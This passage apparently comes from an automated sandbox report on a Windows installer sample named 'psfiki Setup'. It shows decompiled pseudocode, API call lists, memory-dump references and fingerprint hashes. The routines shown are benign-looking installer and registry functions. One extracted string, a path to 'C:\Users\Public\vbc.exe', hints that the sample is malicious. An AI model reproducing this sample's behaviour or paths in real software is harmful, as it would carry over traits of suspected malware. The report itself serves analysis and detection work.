                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                          					_a8 = _t70;
                                          					GetClientRect(_a4,  &_v32);
                                          					_t126 = _v32.bottom;
                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                          					while(_v32.top < _t126) {
                                          						_a12 = _t126 - _v32.top;
                                          						asm("cdq");
                                          						asm("cdq");
                                          						asm("cdq");
                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                          						_t87 = CreateBrushIndirect( &_v16);
                                          						_v32.bottom = _v32.bottom + 4;
                                          						_a16 = _t87;
                                          						FillRect(_a8,  &_v32, _t87);
                                          						DeleteObject(_a16);
                                          						_v32.top = _v32.top + 4;
                                          					}
                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                          						_a16 = _t94;
                                          						if(_t94 != 0) {
                                          							_t128 = _a8;
                                          							_v32.left = 0x10;
                                          							_v32.top = 8;
                                          							SetBkMode(_t128, 1);
                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                          							_a8 = SelectObject(_t128, _a16);
                                          							DrawTextA(_t128, "psfiki Setup", 0xffffffff,  &_v32, 0x820);
                                          							SelectObject(_t128, _a8);
                                          							DeleteObject(_a16);
                                          						}
                                          					}
                                          					EndPaint(_a4,  &_v96);
                                          					return 0;
                                          				}
                                          				_t102 = _a16;
                                          				if(_a8 == 0x46) {
                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                          					_t115 =  *0x42eb68; // 0x402f0
                                          					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                          				}
                                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                          			}

                                          APIs
                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32 ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextA.USER32(00000000,psfiki Setup,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F$psfiki Setup
                                          • API String ID: 941294808-3259575529
                                          • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                          • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                                          • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                          • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001B39
                                          • RegOpenKeyExW.ADVAPI32 ref: 10001B8D
                                          • RegQueryValueExW.ADVAPI32(?,Default,00000000,00000000,?,0000004E), ref: 10001BBD
                                          • RegCloseKey.ADVAPI32(?), ref: 10001BD0
                                          • CLSIDFromString.OLE32(?,00000000), ref: 10001BE5
                                          • RegQueryValueExW.ADVAPI32(?,Profile,00000000,00000000,?,0000004E), ref: 10001C00
                                          • CLSIDFromString.OLE32(?,00000000), ref: 10001C17
                                          • RegCloseKey.ADVAPI32(?), ref: 10001C21
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FromString$CloseQueryValue$Open
                                          • String ID: %p) %x %s %p %p$%s\%s\0x%08x\%s$Assemblies$Default$N$Profile
                                          • API String ID: 1689171533-1912333115
                                          • Opcode ID: 7596cd7ef67e1eec43bd0e5abd0cf82f37af6f28dd64996ae9a01d78d5ebc5b1
                                          • Instruction ID: 3a2f49f4a4d5d31c2d692a5181de3d78ea64db33be0623e4c54ab0343e307f6c
                                          • Opcode Fuzzy Hash: 7596cd7ef67e1eec43bd0e5abd0cf82f37af6f28dd64996ae9a01d78d5ebc5b1
                                          • Instruction Fuzzy Hash: 23416FB5900218FBEB11DF90DC89FEF73B9EB48344F108519F6059A145E775EA84CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00405679() {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t15;
                                          				long _t16;
                                          				intOrPtr _t18;
                                          				int _t20;
                                          				void* _t28;
                                          				long _t29;
                                          				intOrPtr* _t37;
                                          				int _t43;
                                          				void* _t44;
                                          				long _t47;
                                          				CHAR* _t49;
                                          				void* _t51;
                                          				void* _t53;
                                          				intOrPtr* _t54;
                                          				void* _t55;
                                          				void* _t56;
                                          
                                          				_t15 = E00405C49(1);
                                          				_t49 =  *(_t55 + 0x18);
                                          				if(_t15 != 0) {
                                          					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                          					if(_t20 != 0) {
                                          						L16:
                                          						 *0x42ebf0 =  *0x42ebf0 + 1;
                                          						return _t20;
                                          					}
                                          				}
                                          				 *0x42c168 = 0x4c554e;
                                          				if(_t49 == 0) {
                                          					L5:
                                          					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
                                          					if(_t16 != 0 && _t16 <= 0x400) {
                                          						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
                                          						_t18 =  *0x42eb70; // 0x2903c0
                                          						_t56 = _t55 + 0x10;
                                          						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
                                          						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
                                          						_t53 = _t20;
                                          						 *(_t56 + 0x14) = _t53;
                                          						if(_t53 == 0xffffffff) {
                                          							goto L16;
                                          						}
                                          						_t47 = GetFileSize(_t53, 0);
                                          						_t7 = _t43 + 0xa; // 0xa
                                          						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                          						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                          							L15:
                                          							_t20 = CloseHandle(_t53);
                                          							goto L16;
                                          						} else {
                                          							if(E00405577(_t51, "[Rename]\r\n") != 0) {
                                          								_t28 = E00405577(_t26 + 0xa, 0x409328);
                                          								if(_t28 == 0) {
                                          									L13:
                                          									_t29 = _t47;
                                          									L14:
                                          									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
                                          									SetFilePointer(_t53, 0, 0, 0);
                                          									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                          									GlobalFree(_t51);
                                          									goto L15;
                                          								}
                                          								_t37 = _t28 + 1;
                                          								_t44 = _t51 + _t47;
                                          								_t54 = _t37;
                                          								if(_t37 >= _t44) {
                                          									L21:
                                          									_t53 =  *(_t56 + 0x14);
                                          									_t29 = _t37 - _t51;
                                          									goto L14;
                                          								} else {
                                          									goto L20;
                                          								}
                                          								do {
                                          									L20:
                                          									 *((char*)(_t43 + _t54)) =  *_t54;
                                          									_t54 = _t54 + 1;
                                          								} while (_t54 < _t44);
                                          								goto L21;
                                          							}
                                          							E0040592B(_t51 + _t47, "[Rename]\r\n");
                                          							_t47 = _t47 + 0xa;
                                          							goto L13;
                                          						}
                                          					}
                                          				} else {
                                          					CloseHandle(E00405602(_t49, 0, 1));
                                          					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
                                          					if(_t16 != 0 && _t16 <= 0x400) {
                                          						goto L5;
                                          					}
                                          				}
                                          				return _t16;
                                          			}























                                          APIs
                                            • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                            • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?), ref: 00405C66
                                            • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403126,00000008), ref: 00405C77
                                          • CloseHandle.KERNEL32(00000000), ref: 004056C6
                                          • GetShortPathNameA.KERNEL32 ref: 004056CF
                                          • GetShortPathNameA.KERNEL32 ref: 004056EC
                                          • wsprintfA.USER32 ref: 0040570A
                                          • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040576A
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004057C2
                                          • GlobalFree.KERNEL32(00000000), ref: 004057C9
                                          • CloseHandle.KERNEL32(00000000), ref: 004057D0
                                            • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                            • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                          • String ID: %s=%s$[Rename]
                                          • API String ID: 3772915668-1727408572
                                          • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                          • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                                          • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                          • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10001D13
                                          • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001D6F
                                          • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001D8A
                                          • RegSetValueExW.ADVAPI32 ref: 10001DA3
                                          • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001DB3
                                          • RegSetValueExW.ADVAPI32 ref: 10001DCC
                                          • RegCloseKey.ADVAPI32(?), ref: 10001DD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FromString$Value$CloseCreate
                                          • String ID: %p) %x %s %s$%s\%s\0x%08x\%s$Assemblies$Default$Profile
                                          • API String ID: 1318437696-2502594939
                                          • Opcode ID: 6140695aa2c3c355fae86e48aba0d39237f2862502cb683440458cbb598cb8e2
                                          • Instruction ID: 21ff69b6d0de9df669c9189513857e3110406e759913047922b54b077a0bf55b
                                          • Opcode Fuzzy Hash: 6140695aa2c3c355fae86e48aba0d39237f2862502cb683440458cbb598cb8e2
                                          • Instruction Fuzzy Hash: 725128B5A40208BBEB10CFA4DC85FEE73B8FB48700F108559F609AB185D775EA40CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100022D9
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100022E9
                                          • RegOpenKeyExW.ADVAPI32 ref: 10002344
                                          • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 1000236F
                                          • RegCloseKey.ADVAPI32(?), ref: 1000237C
                                          • RegOpenKeyExW.ADVAPI32 ref: 1000239F
                                          • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 100023CA
                                          • RegCloseKey.ADVAPI32(?), ref: 100023D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CloseFromOpenQueryStringValue
                                          • String ID: %s\%s\%s\0x%08x\%s$(%p) %s, %i, %s, %p$Enable$LanguageProfile
                                          • API String ID: 193680167-3603924166
                                          • Opcode ID: 965f598014044e6cb2a74314dd359c2b21e1ba92f68f0197124d58f804cc13c6
                                          • Instruction ID: e0afc1c3e8cc1758114bb43238032c388e7b65ae456dc7f798437941352d8589
                                          • Opcode Fuzzy Hash: 965f598014044e6cb2a74314dd359c2b21e1ba92f68f0197124d58f804cc13c6
                                          • Instruction Fuzzy Hash: 59411BB5900219FBEB10DF90CD85FEE77B8EB48341F108558F609A6185D774AB84CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10002459
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10002469
                                          • RegOpenKeyExW.ADVAPI32 ref: 100024C4
                                          • RegSetValueExW.ADVAPI32 ref: 100024E6
                                          • RegCloseKey.ADVAPI32(?), ref: 100024F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FromString$CloseOpenValue
                                          • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                                          • API String ID: 3688305288-1256949467
                                          • Opcode ID: dcad35c9addcfa30248687e1e7a228625dd348cd4a81a67f9936bd1afb2d6bb6
                                          • Instruction ID: dd30ddd5a5cb2d9cca6a9fcc35acfb5c399f927f0ea2933d465295ab16058b1e
                                          • Opcode Fuzzy Hash: dcad35c9addcfa30248687e1e7a228625dd348cd4a81a67f9936bd1afb2d6bb6
                                          • Instruction Fuzzy Hash: 853171F6940209BBEB10DF94DC85FEE73BCEB48304F008058FB0996145E634EA84DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100021B9
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100021C9
                                          • RegOpenKeyExW.ADVAPI32 ref: 10002224
                                          • RegSetValueExW.ADVAPI32 ref: 10002246
                                          • RegCloseKey.ADVAPI32(?), ref: 10002250
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FromString$CloseOpenValue
                                          • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                                          • API String ID: 3688305288-1256949467
                                          • Opcode ID: 4a201888ca8155c40b196f2c3bb0ed33290918c1e59c55bb0eaeb5826365ea5f
                                          • Instruction ID: 707a816b6f367a8867edb1d894fc3f74974bc16e3b4ae18b67003bc7ae207e43
                                          • Opcode Fuzzy Hash: 4a201888ca8155c40b196f2c3bb0ed33290918c1e59c55bb0eaeb5826365ea5f
                                          • Instruction Fuzzy Hash: 843171F6900209BBEB10DFD4DC45FEE73B8EB49344F008158FB09A6145E634EA94DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100014BA
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100014CA
                                          • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000152F
                                          • RegSetValueExW.ADVAPI32 ref: 1000155E
                                          • RegCloseKey.ADVAPI32(?), ref: 1000156E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: FromString$CloseCreateValue
                                          • String ID: %s\%s\%s\0x%08x\%s$Enable$LanguageProfile
                                          • API String ID: 32363474-1306068423
                                          • Opcode ID: 15eac15c22e6ca0fd1bef94188981c34aea0e966a95ebf0e999b4a3de9402c17
                                          • Instruction ID: 970c8a12cf1038bedb1d76203bb66aad53a9130514561c716853c8dd6fd8085d
                                          • Opcode Fuzzy Hash: 15eac15c22e6ca0fd1bef94188981c34aea0e966a95ebf0e999b4a3de9402c17
                                          • Instruction Fuzzy Hash: B2214FB5900318FBFB10DB90CC89FEEB3B8EB48705F108148F7196A181D774AA84CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000070), ref: 100010AA
                                          • HeapAlloc.KERNEL32(00000000), ref: 100010B1
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 10001108
                                          • HeapFree.KERNEL32(00000000), ref: 1000110F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Heap$Process$AllocFree
                                          • String ID: returning %p
                                          • API String ID: 756756679-1981732286
                                          • Opcode ID: ce3facce4ff9c26b52351e7df047192d033f14a14ca3dc13a5d1e94c2effc99a
                                          • Instruction ID: 7e5beea36896861cde5788d291afa94460dc3cd3070cc2fbcf440a17265baa9d
                                          • Opcode Fuzzy Hash: ce3facce4ff9c26b52351e7df047192d033f14a14ca3dc13a5d1e94c2effc99a
                                          • Instruction Fuzzy Hash: E5213D78A44208FFE700DFA0CD89B9D77B5EB49741F208048FA09AB395D775AE80DB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.ADVAPI32 ref: 1000305D
                                          • RegEnumKeyExW.ADVAPI32(?,?,?,00000027,00000000,00000000,00000000,00000000), ref: 100030A6
                                          • RegCloseKey.ADVAPI32(?), ref: 100030C5
                                          • CLSIDFromString.OLE32(?,?), ref: 100030FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CloseEnumFromOpenString
                                          • String ID: %s\%s\0x%08x$'$LanguageProfile
                                          • API String ID: 2638302380-2813637096
                                          • Opcode ID: 5eed58f2ea4a22bca3c4b3957828da32315238e0d51bc9520cea9a942b8bead6
                                          • Instruction ID: 85c7a27dcce935bfc98fc901b500c2beed21861ca5b25b0ed885c813cd7c1327
                                          • Opcode Fuzzy Hash: 5eed58f2ea4a22bca3c4b3957828da32315238e0d51bc9520cea9a942b8bead6
                                          • Instruction Fuzzy Hash: 3661E5B5600209EFDB04DF54C890BAABBB9FF48354F10C259F9099B395D774EA85CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405B89(CHAR* _a4) {
                                          				char _t5;
                                          				char _t7;
                                          				char* _t15;
                                          				char* _t16;
                                          				CHAR* _t17;
                                          
                                          				_t17 = _a4;
                                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                          					_t17 =  &(_t17[4]);
                                          				}
                                          				if( *_t17 != 0 && E0040548B(_t17) != 0) {
                                          					_t17 =  &(_t17[2]);
                                          				}
                                          				_t5 =  *_t17;
                                          				_t15 = _t17;
                                          				_t16 = _t17;
                                          				if(_t5 != 0) {
                                          					do {
                                          						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
                                          							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
                                          							_t16 = CharNextA(_t16);
                                          						}
                                          						_t17 = CharNextA(_t17);
                                          						_t5 =  *_t17;
                                          					} while (_t5 != 0);
                                          				}
                                          				 *_t16 =  *_t16 & 0x00000000;
                                          				while(1) {
                                          					_t16 = CharPrevA(_t15, _t16);
                                          					_t7 =  *_t16;
                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                          						break;
                                          					}
                                          					 *_t16 =  *_t16 & 0x00000000;
                                          					if(_t15 < _t16) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				return _t7;
                                          			}









                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-1374994687
                                          • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                          • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                                          • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                          • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                          				struct tagLOGBRUSH _v16;
                                          				long _t35;
                                          				long _t37;
                                          				void* _t40;
                                          				long* _t49;
                                          
                                          				if(_a4 + 0xfffffecd > 5) {
                                          					L15:
                                          					return 0;
                                          				}
                                          				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                          				if(_t49 == 0) {
                                          					goto L15;
                                          				}
                                          				_t35 =  *_t49;
                                          				if((_t49[5] & 0x00000002) != 0) {
                                          					_t35 = GetSysColor(_t35);
                                          				}
                                          				if((_t49[5] & 0x00000001) != 0) {
                                          					SetTextColor(_a8, _t35);
                                          				}
                                          				SetBkMode(_a8, _t49[4]);
                                          				_t37 = _t49[1];
                                          				_v16.lbColor = _t37;
                                          				if((_t49[5] & 0x00000008) != 0) {
                                          					_t37 = GetSysColor(_t37);
                                          					_v16.lbColor = _t37;
                                          				}
                                          				if((_t49[5] & 0x00000004) != 0) {
                                          					SetBkColor(_a8, _t37);
                                          				}
                                          				if((_t49[5] & 0x00000010) != 0) {
                                          					_v16.lbStyle = _t49[2];
                                          					_t40 = _t49[3];
                                          					if(_t40 != 0) {
                                          						DeleteObject(_t40);
                                          					}
                                          					_t49[3] = CreateBrushIndirect( &_v16);
                                          				}
                                          				return _t49[3];
                                          			}









                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                          • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                                          • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                          • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
